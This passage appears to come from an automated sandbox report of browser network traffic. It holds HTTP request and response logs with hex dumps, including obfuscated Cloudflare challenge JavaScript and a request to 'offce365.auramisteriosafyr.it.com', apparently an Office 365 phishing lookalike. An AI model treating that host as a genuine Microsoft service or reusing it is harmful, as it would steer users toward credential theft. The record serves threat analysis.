                                                                                        2025-03-24 04:00:06 UTC1369INData Raw: 69 3d 3d 68 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 68 74 28 31 35 32 37 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 68 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 68 75 29 7b 72 65 74 75 72 6e 20 68 75 3d 62 2c 68 75 28 39 39 37 29 5b 68 75 28 31 33 33 33 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 68 76 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 51 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 68 76 3d 68 74 2c 64 5b 68 76 28 31 35 33 31 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d
                                                                                        Data Ascii: i==h}},e=String[ht(1527)],f={'h':function(h){return null==h?'':f.g(h,6,function(i,hu){return hu=b,hu(997)[hu(1333)](i)})},'g':function(i,j,o,hv,s,x,B,C,D,E,F,G,H,I,J,Q,K,L,M){if(hv=ht,d[hv(1531)](null,i))return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=
                                                                                        2025-03-24 04:00:06 UTC1369INData Raw: 34 29 5d 28 68 76 28 39 39 32 29 29 2c 51 26 26 51 5b 68 76 28 33 34 34 29 5d 28 68 76 28 38 39 38 29 2c 66 75 6e 63 74 69 6f 6e 28 68 77 29 7b 68 77 3d 68 76 2c 51 5b 68 77 28 36 36 37 29 5d 5b 68 77 28 35 38 30 29 5d 3d 68 77 28 31 35 34 35 29 2c 51 28 68 77 28 32 38 37 29 2c 68 77 28 37 32 31 29 29 7d 29 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 68 76 28 31 31 39 38 29 5d 5b 68 76 28 31 33 34 32 29 5d 5b 68 76 28 37 30 35 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 68 76 28 35 39 39 29 5d 28 32 35 36 2c 43 5b 68 76 28 31 33 39 32 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 49 3d 3d 64 5b 68 76 28 39 31 30 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 68 76 28 31 30 39 39 29 5d 28 64 5b 68 76 28 31 30 31 34 29 5d 28
                                                                                        Data Ascii: 4)](hv(992)),Q&&Q[hv(344)](hv(898),function(hw){hw=hv,Q[hw(667)][hw(580)]=hw(1545),Q(hw(287),hw(721))});else{if(Object[hv(1198)][hv(1342)][hv(705)](B,C)){if(d[hv(599)](256,C[hv(1392)](0))){for(s=0;s<F;H<<=1,I==d[hv(910)](j,1)?(I=0,G[hv(1099)](d[hv(1014)](
                                                                                        2025-03-24 04:00:06 UTC1369INData Raw: 61 74 68 5b 68 7a 28 37 31 33 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 46 21 3d 4b 3b 29 69 66 28 64 5b 68 7a 28 39 38 39 29 5d 28 68 7a 28 31 34 32 38 29 2c 68 7a 28 31 34 32 38 29 29 29 7b 66 6f 72 28 4c 3d 68 7a 28 38 33 32 29 5b 68 7a 28 36 38 33 29 5d 28 27 7c 27 29 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4c 5b 4d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 4a 7c 3d 28 64 5b 68 7a 28 33 39 34 29 5d 28 30 2c 4e 29 3f 31 3a 30 29 2a 46 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 46 3c 3c 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 48 3e 3e 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 4e 3d 47 26 48 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 64 5b 68 7a 28 31 30 34 32 29 5d 28 30 2c 48 29 26 26
                                                                                        Data Ascii: ath[hz(713)](2,2),F=1;F!=K;)if(d[hz(989)](hz(1428),hz(1428))){for(L=hz(832)[hz(683)]('|'),M=0;!![];){switch(L[M++]){case'0':J|=(d[hz(394)](0,N)?1:0)*F;continue;case'1':F<<=1;continue;case'2':H>>=1;continue;case'3':N=G&H;continue;case'4':d[hz(1042)](0,H)&&
                                                                                        2025-03-24 04:00:06 UTC1369INData Raw: 34 33 32 29 5d 28 4f 2c 42 29 29 4f 3d 64 5b 68 7a 28 33 31 30 29 5d 28 45 2c 45 5b 68 7a 28 31 33 33 33 29 5d 28 30 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 68 7a 28 31 30 39 39 29 5d 28 4f 29 2c 73 5b 42 2b 2b 5d 3d 45 2b 4f 5b 68 7a 28 31 33 33 33 29 5d 28 30 29 2c 78 2d 2d 2c 45 3d 4f 2c 64 5b 68 7a 28 36 30 37 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 68 7a 28 37 31 33 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 68 74 28 31 34 37 36 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 4a 28 31 32 30 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 42 2c 64 2c 65 2c 66 2c 67 29 7b 68 42 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 68 42 28 37 33 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e
                                                                                        Data Ascii: 432)](O,B))O=d[hz(310)](E,E[hz(1333)](0));else return null;D[hz(1099)](O),s[B++]=E+O[hz(1333)](0),x--,E=O,d[hz(607)](0,x)&&(x=Math[hz(713)](2,C),C++)}}},g={},g[ht(1476)]=f.h,g}(),eM[gJ(1205)]=function(hB,d,e,f,g){hB=gJ,d={},d[hB(737)]=function(h,i){return
                                                                                        2025-03-24 04:00:06 UTC1369INData Raw: 6e 75 65 3b 63 61 73 65 27 32 27 3a 6a 3d 6b 5b 68 48 28 37 31 33 29 5d 28 32 2c 68 5b 68 48 28 34 34 30 29 5d 28 44 3e 3e 34 2e 35 31 7c 28 6e 26 32 35 35 29 3c 3c 34 2c 31 30 32 33 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 6d 2a 3d 68 5b 68 48 28 31 32 39 34 29 5d 28 31 2b 2d 32 2a 68 5b 68 48 28 31 34 32 37 29 5d 28 6e 2c 37 29 2c 43 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 69 3d 74 68 69 73 2e 68 5b 68 5b 68 48 28 31 36 32 33 29 5d 28 39 35 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 68 5b 68 48 28 36 31 31 29 5d 28 68 5b 68 48 28 34 34 30 29 5d 28 74 68 69 73 2e 68 5b 39 35 2e 35 35 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 68 48 28 31 33 39 32 29 5d 28 74 68 69 73 2e 68 5b 68 5b 68 48 28 31 36 32 33 29 5d 28 39 35 2c 74 68 69
                                                                                        Data Ascii: nue;case'2':j=k[hH(713)](2,h[hH(440)](D>>4.51|(n&255)<<4,1023));continue;case'3':m*=h[hH(1294)](1+-2*h[hH(1427)](n,7),C);continue;case'4':i=this.h[h[hH(1623)](95,this.g)][3]^h[hH(611)](h[hH(440)](this.h[95.55^this.g][1][hH(1392)](this.h[h[hH(1623)](95,thi
                                                                                        2025-03-24 04:00:06 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 6a 5b 68 49 28 38 36 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 6a 5b 68 49 28 36 32 38 29 5d 3d 68 49 28 32 38 33 29 2c 6a 29 3b 74 72 79 7b 66 6f 72 28 6c 3d 68 49 28 31 35 30 35 29 5b 68 49 28 36 38 33 29 5d 28 27 7c 27 29 2c 6d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6c 5b 6d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 43 5b 68 49 28 34 37 31 29 5d 28 6b 5b 68 49 28 34 31 34 29 5d 2c 44 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 43 5b 68 49 28 32 36 33 29 5d 28 66 32 5b 68 49 28 31 34 37 36 29 5d 28 76 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 6f 3d 28 6e 3d 7b 7d 2c 6e 5b 68 49 28 38 31 36
                                                                                        Data Ascii: function(E,F){return E+F},j[hI(862)]=function(E,F){return E+F},j[hI(628)]=hI(283),j);try{for(l=hI(1505)[hI(683)]('|'),m=0;!![];){switch(l[m++]){case'0':C[hI(471)](k[hI(414)],D);continue;case'1':C[hI(263)](f2[hI(1476)](v));continue;case'2':o=(n={},n[hI(816


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.1649718104.18.95.414436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:06 UTC784OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:06 UTC240INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:06 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        cache-control: max-age=2629800, public
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 92534277cb6941d5-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-24 04:00:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.1649705172.67.210.1684436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:06 UTC681OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: offce365.auramisteriosafyr.it.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://offce365.auramisteriosafyr.it.com/CM4kN/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: PHPSESSID=dv6sf7uhb6cju4btkvukae9i2f
                                                                                        2025-03-24 04:00:07 UTC854INHTTP/1.1 404 Not Found
                                                                                        Date: Mon, 24 Mar 2025 04:00:06 GMT
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=14400
                                                                                        cf-cache-status: MISS
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5UBk3rQnclcxXKeAPlIheZ9QYWnQ%2BzqjVzkYHto1DL1PB4nncH5Fg6dUbhHeCXiAQKHc36%2FSBtz%2BE3APxMn9Kaxhrg6ctmkYonyYsuEq08YD3g70Zf1nyKaNEHMcPz1Nr2X7N7Q4DHztwHGsUGhentSWXno%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9253427a7c054294-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=96747&min_rtt=96446&rtt_var=20640&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2864&recv_bytes=1253&delivery_rate=38619&cwnd=248&unsent_bytes=0&cid=0d6d9ae2b3b3df3e&ts=3060&x=0"
                                                                                        2025-03-24 04:00:07 UTC202INData Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                        Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                        2025-03-24 04:00:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.1649719104.18.95.414436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:06 UTC425OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:06 UTC240INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:06 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        cache-control: max-age=2629800, public
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9253427b5aa7c440-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-24 04:00:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.1649720104.18.95.414436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:07 UTC1190OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/738700453:1742786781:0bMVTCrKe1fCs7EDN-2RZn2fetqNFoGDkEtvOP3zshU/92534274b8aa19bf/qg5KjHfcPoZeENQ52Rg65SlJBWTDr6LLKFy69zqQcvI-1742788805-1.1.1.1-5oXn2yBUFWvr3Wf2MuqzEzL61opr0KkokL4MvDDW7gh1I6j9uQT2dHyZ2GaF.nJ1 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 3789
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                        cf-chl: qg5KjHfcPoZeENQ52Rg65SlJBWTDr6LLKFy69zqQcvI-1742788805-1.1.1.1-5oXn2yBUFWvr3Wf2MuqzEzL61opr0KkokL4MvDDW7gh1I6j9uQT2dHyZ2GaF.nJ1
                                                                                        cf-chl-ra: 0
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:07 UTC3789OUTData Raw: 53 5a 6a 34 68 34 41 34 33 34 6a 34 44 2b 37 6b 2b 37 62 34 2b 4f 38 75 2d 58 2b 76 37 2d 37 67 65 4f 46 43 4a 37 55 6f 75 34 7a 4a 38 6f 37 6c 37 32 4a 2d 75 36 4a 6e 41 64 36 37 76 4a 46 36 37 48 37 53 4d 34 37 68 6f 34 37 71 46 37 71 6d 5a 6e 35 37 33 6a 78 6f 6f 36 46 4a 38 49 37 59 4f 38 67 37 33 47 79 55 37 63 37 38 30 74 46 35 34 38 64 37 30 54 6f 50 54 6f 64 4a 4f 6f 5a 62 42 66 61 5a 37 64 79 53 34 6f 75 32 37 59 59 59 64 41 76 6d 6a 48 47 37 37 6d 45 6a 72 35 46 2b 50 6a 46 6d 71 64 53 30 71 63 47 66 47 31 74 4a 75 37 35 33 34 32 71 2d 6a 64 37 4a 37 6b 45 37 37 44 34 5a 4f 35 37 32 49 52 37 6e 50 37 6a 6a 37 45 34 6e 72 75 4b 4a 37 24 34 42 55 52 2d 6b 6f 4c 33 45 55 37 6f 55 55 38 45 4f 57 64 33 36 37 2b 36 4f 37 76 34 2b 49 43 4f 4f 37 4f 36
                                                                                        Data Ascii: SZj4h4A434j4D+7k+7b4+O8u-X+v7-7geOFCJ7Uou4zJ8o7l72J-u6JnAd67vJF67H7SM47ho47qF7qmZn573jxoo6FJ8I7YO8g73GyU7c780tF548d70ToPTodJOoZbBfaZ7dyS4ou27YYYdAvmjHG77mEjr5F+PjFmqdS0qcGfG1tJu75342q-jd7J7kE77D4ZO572IR7nP7jj7E4nruKJ7$4BUR-koL3EU7oUU8EOWd367+6O7v4+ICOO7O6
                                                                                        2025-03-24 04:00:07 UTC1091INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:07 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 231052
                                                                                        Connection: close
                                                                                        cf-chl-gen: 7bW4LiNh+25R1+5BNB4yFFwpmBGwl7U8WAQLzChVQOYNIJ9YoMlloGcoKys9zMnFOpno1l+CTcQS0nX6JmnGD+upvpGQ7ms/2bRcEqXKRcAla+ZhGZvOrW+r7E2RnXeCCPI8Ds4m8Vl+HAh/07HCHLMj+AJJEEfuHWzyHOLe6/GAiqp9jHapUn9PtYvfrs7kJOqMnCc/oNWTn/p63mnET7EIyiAIMYYiYIz3rFfVynCSdRJbm6wy790kDPqXkGc+raB4hIbCCPI1WxQllBL3E18pFIxBO6NbzJ0JnSqrcdd7f8NEBHr9o402opWXe5QDkwHYZaRhroy1Q70aKFKfImfAgMvdM3R0Rrab9MiYbbbJgqWR3dk6UDB5yfXnmc95uEoUdP1kcHQRBnFK+jhmXi1WsBEfMjTgIaKhIo6in13968Tr4qwgzJqppIDBgaioErlDBENOmGEphBgRUgdEiI2+kFJOA4q5HxOqXRisvK2r02580uhXM+BOmmXCddSYXiMlsnL+nvRsk+JBiUIT7fI8bKmoOKN56XQ9l1EFnAZV80ZzLSRk0tnaa/6dFYDNlrLn5ou0PtLUNWAwi0XVm7sD5z0GN9LgI9UvyMjY5JI+mCxFFOkkN5HrzAdcGz3ZM/JihIgOeZddT80ouyujOEsF1HW/DWF/i4fQg3jPCBcB1N32VK41RSeBYWWbeBckinOFWOgv6nxuRs9FVvNz/uwBTxW2IdfnBBJChRgHj3McPk96T3EMVNzeUuPxCyxESNhx2AgyKc0Qf+2q1JT1KCfTNl3FW0NBjH2Q6bR1sIJBheJuKSsbQ6hb9oYaLlhj$UnOHzMj6F+sUI5geqBmnlg==
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9253427cbed81780-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-24 04:00:07 UTC278INData Raw: 59 6b 65 42 62 48 32 50 67 6f 31 6b 58 32 46 53 64 47 43 44 61 6f 4e 72 62 6d 69 4c 66 33 6d 62 65 4a 4a 63 68 48 43 52 68 33 35 6d 6b 36 32 45 61 6d 57 70 6e 61 56 79 70 71 69 48 74 49 53 42 65 4c 4e 35 65 72 4a 2f 72 4a 47 57 74 6e 39 33 70 71 61 56 68 71 6d 55 74 36 6d 32 72 62 79 64 75 37 4f 74 30 4d 44 4c 79 34 75 77 79 36 6d 38 70 35 48 49 6e 74 76 4e 73 36 4b 67 6f 39 57 34 75 64 6a 6c 36 4b 54 6f 36 4f 53 71 72 38 69 31 7a 38 4c 6d 39 64 50 73 75 4d 6a 52 33 76 66 31 7a 37 76 73 34 66 4c 57 42 65 58 32 32 39 72 61 41 74 2f 70 43 66 76 76 38 41 77 4a 35 38 37 57 37 77 54 74 42 78 41 54 41 68 6f 69 42 50 59 48 2f 42 59 67 43 66 63 56 4c 76 6f 75 41 78 33 75 4d 68 37 75 2f 6a 55 77 4b 76 62 31 4f 79 59 54 2f 54 7a 33 4f 69 4a 44 52 54 77 6a 50 44 5a
                                                                                        Data Ascii: YkeBbH2Pgo1kX2FSdGCDaoNrbmiLf3mbeJJchHCRh35mk62EamWpnaVypqiHtISBeLN5erJ/rJGWtn93pqaVhqmUt6m2rbydu7Ot0MDLy4uwy6m8p5HIntvNs6Kgo9W4udjl6KTo6OSqr8i1z8Lm9dPsuMjR3vf1z7vs4fLWBeX229raAt/pCfvv8AwJ587W7wTtBxATAhoiBPYH/BYgCfcVLvouAx3uMh7u/jUwKvb1OyYT/Tz3OiJDRTwjPDZ
                                                                                        2025-03-24 04:00:07 UTC1369INData Raw: 4d 36 56 31 49 7a 4b 56 6f 7a 59 53 77 2f 51 6c 68 42 4d 7a 70 64 57 6d 31 59 58 7a 6c 67 63 47 4a 64 5a 43 78 76 4f 44 64 73 59 32 56 77 66 6c 31 79 64 47 78 68 55 49 42 77 58 6c 5a 65 64 47 78 5a 6a 49 46 70 54 49 4a 73 68 48 2b 53 54 56 53 46 55 35 52 61 63 6f 35 76 69 36 47 61 64 56 79 65 6d 6f 35 77 63 35 61 67 72 49 4b 41 6d 62 43 63 66 5a 71 46 71 5a 57 79 71 61 5a 31 69 35 4a 34 6a 5a 4b 61 77 49 2b 35 76 72 79 39 66 62 2b 79 71 4d 71 6a 77 59 6d 63 77 37 2b 79 71 36 69 50 7a 4a 50 4f 6b 73 69 36 75 72 71 75 75 37 72 59 6e 71 33 68 75 64 4b 38 6f 64 37 6d 31 36 48 5a 75 4b 32 76 37 65 61 72 73 73 71 6e 38 75 4f 31 39 4c 44 57 37 76 6a 6f 32 38 33 4f 36 75 48 67 2f 50 72 37 38 72 76 44 33 50 33 74 32 65 54 68 36 2b 73 46 44 41 6f 48 33 78 50 4c 39
                                                                                        Data Ascii: M6V1IzKVozYSw/QlhBMzpdWm1YXzlgcGJdZCxvODdsY2Vwfl1ydGxhUIBwXlZedGxZjIFpTIJshH+STVSFU5Raco5vi6GadVyemo5wc5agrIKAmbCcfZqFqZWyqaZ1i5J4jZKawI+5vry9fb+yqMqjwYmcw7+yq6iPzJPOksi6urquu7rYnq3hudK8od7m16HZuK2v7earssqn8uO19LDW7vjo283O6uHg/Pr78rvD3P3t2eTh6+sFDAoH3xPL9
                                                                                        2025-03-24 04:00:07 UTC1369INData Raw: 32 4d 7a 34 67 57 6b 42 43 58 31 64 44 54 43 73 36 5a 6b 78 6e 51 46 4e 67 4d 57 4e 41 56 6e 4a 73 61 56 67 37 4d 47 42 67 65 54 78 35 62 45 4a 6e 68 6e 43 42 64 6f 6c 6b 53 45 68 67 65 6f 69 52 55 47 6c 39 6b 58 47 59 68 33 4a 30 64 49 78 6e 6b 49 35 2b 62 35 46 7a 6c 33 4b 61 65 47 53 43 6d 33 32 72 67 71 53 41 6f 35 4b 64 68 4a 35 74 67 49 2b 52 74 4c 46 37 71 6f 6d 39 6b 4a 39 36 73 58 79 6c 77 4b 4b 55 77 38 6a 43 6e 4c 69 75 30 4d 6d 77 6d 73 4c 4e 73 36 47 34 74 61 4b 32 76 4d 37 55 72 39 6d 31 76 37 7a 45 6f 4e 6a 66 75 65 50 6d 76 4b 54 4b 71 4f 53 34 79 4f 50 49 77 73 44 76 34 66 69 34 74 72 58 33 35 74 79 2b 76 74 6a 35 37 66 4c 54 32 4e 44 77 78 73 44 2b 32 73 76 49 33 39 76 2b 44 4f 2f 65 37 66 55 45 45 74 50 78 45 74 55 58 46 2f 37 58 34 41
                                                                                        Data Ascii: 2Mz4gWkBCX1dDTCs6ZkxnQFNgMWNAVnJsaVg7MGBgeTx5bEJnhnCBdolkSEhgeoiRUGl9kXGYh3J0dIxnkI5+b5Fzl3KaeGSCm32rgqSAo5KdhJ5tgI+RtLF7qom9kJ96sXylwKKUw8jCnLiu0MmwmsLNs6G4taK2vM7Ur9m1v7zEoNjfuePmvKTKqOS4yOPIwsDv4fi4trX35ty+vtj57fLT2NDwxsD+2svI39v+DO/e7fUEEtPxEtUXF/7X4A
                                                                                        2025-03-24 04:00:07 UTC1369INData Raw: 49 6c 70 59 62 47 4e 4f 4b 53 74 6f 61 47 6c 67 53 56 64 67 62 6b 6f 34 61 46 78 6d 64 45 68 2f 50 31 68 33 51 7a 2b 41 56 34 5a 6c 66 55 68 30 52 6e 61 49 68 5a 47 44 59 6c 78 53 61 59 46 7a 68 34 74 72 64 35 74 36 58 70 47 57 6e 33 75 4d 62 70 75 58 68 70 32 64 69 35 6d 56 68 32 69 44 6f 57 75 79 63 49 79 57 66 36 57 4a 68 58 69 34 65 37 4e 2f 72 70 44 43 78 48 79 62 75 48 32 67 6e 72 69 73 76 4b 54 44 6a 5a 32 5a 77 61 2b 6a 6b 5a 62 47 70 36 62 5a 79 4e 47 71 70 70 47 58 33 73 79 79 73 63 48 65 33 62 44 63 78 37 6d 2f 6e 2b 62 75 72 65 71 38 37 63 6a 55 31 50 4c 4d 34 66 6a 48 31 4d 2b 39 32 4c 6a 4f 33 4c 7a 6b 75 2b 58 50 33 39 54 41 79 50 72 5a 32 77 72 39 2b 73 6a 4a 78 68 66 4d 45 51 54 36 2b 76 41 62 46 67 6b 68 38 39 4d 58 45 67 30 58 2b 4f 41
